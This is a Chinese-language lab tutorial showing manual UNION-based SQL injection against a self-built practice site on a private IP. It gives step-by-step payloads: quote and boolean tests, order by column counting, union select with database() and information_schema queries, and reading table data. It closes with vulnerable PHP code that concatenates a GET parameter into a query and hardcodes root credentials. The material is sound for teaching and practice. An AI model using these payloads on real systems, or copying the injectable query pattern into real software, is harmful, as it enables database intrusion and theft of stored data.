测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1
测试工具:Burp Suite
1.注入过程。
1.1 访问该地址使用burp抓包,返回的结果如下。
1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。
1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。
由以上返回的信息我们可以判断此站点存在sql注入漏洞。
1.4 继续使用order by 1-99语句查询该数据库的字段数量,可以理解为order by=1-99,如访问id=1 order by 3,页面返回与id=1的结果相同,访问id=1 order by 4,页面返回与id=1结果不同,则字段数为3,如下图所示:
1.5 在数据库中查询ID对应的内容,然后将数据库的内容输出到页面,由于是将数据输出到页面上的,所以可以使用union注入,且通过order by查询结果,得到字段数为3,所以union注入的语句如下所示:
union select 1,2,3
因为代码只返回第一条结果,所以union select获取的结果没有输出的页面。此时可以将id的值设置为-1,这样数据库中没有id=-1的数据,所以会返回union select的结果,如下所示:
1.6 返回的结果是2:3,意味着union select 1,2,3中,2和3的位置可以输入Mysql语句。我们尝试查询当前数据库名,访问语句构造如下:
id = 1 union select 1,database(),3
测试结果如下图:
1.7 得知数据库名字之后,继续查询表名。语句构造如下:
select table_name from information_schema.tables where table_schema='security' limit 0,1;
在2的位置加括号后复制以上语句,结果如下所示:
1.8 得知表名继续查询字段名,以以上emails表名为例,构造如下语句:
select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1;
1.9 当获取了库名、表名和字段名时,就可以构造SQL语句查询数据库的数据,例如查询字段email_id对应的数据,构造的SQL语句如下所示。
select email_id from security.emails limit 0,1;
2.Union注入代码分析。
<?php
$con=mysqli_connect("192.168.57.128","root","123","security");
if (mysqli_connect_errno())
{
echo "连接失败: " . mysqli_connect_error();
}
$id = $_GET['id'];
$result = mysqli_query($con,"select * from users where `id`=".$id);
$row = mysqli_fetch_array($result);
echo $row['username'] . " : " . $row['password'];
echo "<br>";
?>
以上程序通过GET参数ID,将ID拼接到SQL语句中,在数据中查询参数ID对应的内容,然后将第一条查询结果中的username和password输出到页面上的,所以可以利用union语句查询其他数据。
此时SQL语句可以分为select * from users where ‘id’ = 1和union select 1,2,3两条,利用第二条语句(union查询)就可以获取数据库中的内容。